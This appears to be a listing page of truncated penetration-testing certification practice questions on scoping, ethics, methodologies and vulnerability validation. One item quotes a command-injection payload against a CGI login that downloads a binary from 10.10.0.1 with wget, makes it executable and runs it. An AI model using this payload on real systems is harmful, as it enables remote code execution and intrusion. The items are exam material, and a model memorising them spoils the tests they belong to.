Which of the following is the MOST important action to take before starting this type of assessment?

A client wants a security assessment company to perform a penetration test against its hot site. The purpose of the test is to determine the effectiveness of the defenses that protect against disruptions to business continuity. Which of the following is the MOST important action to take before starting this...

December 8, 2023 No Comments READ MORE +

Which of the following actions, if performed, would be ethical within the scope of the assessment?

A security company has been contracted to perform a scoped insider-threat assessment to try to gain access to the human resources server that houses PII and salary data. The penetration testers have been given an internal network starting position. Which of the following actions, if performed, would be ethical within...

December 7, 2023 No Comments READ MORE +

Which of the following is the MOST likely reason for the lack of output?

A penetration tester was brute forcing an internal web server and ran a command that produced the following output: However, when the penetration tester tried to browse the URL http://172.16.100.10:3000/profile, a blank page was displayed. Which of the following is the MOST likely reason for the lack of output?A ....

December 7, 2023 No Comments READ MORE +

Which of the following methodologies should be used to BEST meet the client's expectations?

A client would like to have a penetration test performed that leverages a continuously updated TTPs framework and covers a wide variety of enterprise systems and networks. Which of the following methodologies should be used to BEST meet the client's expectations?A . OWASP Top 10B . MITRE ATT&CK frameworkC ....

December 7, 2023 No Comments READ MORE +

exploit += “/cgi-bin/index.cgi?

A penetration tester was able to gain access to a system using an exploit. The following is a snippet of the code that was utilized: exploit = “POST ” exploit += “/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} C c${IFS}’cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS }apache;${IFS}./apache’%0A%27&loginUser=a&Pwd=a” exploit += “HTTP/1.1” Which of the following commands should the penetration tester run post-engagement?A ....

December 7, 2023 No Comments READ MORE +

You are a penetration tester reviewing a client’s website through a web browser

DRAG DROP You are a penetration tester reviewing a client’s website through a web browser. INSTRUCTIONS Review all components of the website through the browser to determine if vulnerabilities are present. Remediate ONLY the highest vulnerability from either the certificate, source, or cookies. If at any time you would like...

December 7, 2023 No Comments READ MORE +

Which of the following BEST identifies this concept?

The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?A . Statement of workB . Program scopeC . Non-disclosure agreementD . Rules...

December 7, 2023 No Comments READ MORE +

Which of the following techniques would MOST likely be used to get legitimate access into the organization's building without raising too many alerts?

A penetration tester was hired to perform a physical security assessment of an organization's office. After monitoring the environment for a few hours, the penetration tester notices that some employees go to lunch in a restaurant nearby and leave their belongings unattended on the table while getting food. Which of...

December 7, 2023 No Comments READ MORE +

Which of the following BEST describe the OWASP Top 10? (Choose two.)

Which of the following BEST describe the OWASP Top 10? (Choose two.)A . The most critical risks of web applicationsB . A list of all the risks of web applicationsC . The risks defined in order of importanceD . A web-application security standardE . A risk-governance and compliance frameworkF ....

December 7, 2023 No Comments READ MORE +

Which of the following is the BEST way to ensure this is a true positive?

A penetration tester completed a vulnerability scan against a web server and identified a single but severe vulnerability. Which of the following is the BEST way to ensure this is a true positive?A . Run another scanner to compare.B . Perform a manual test on the server.C . Check the...

December 6, 2023 No Comments READ MORE +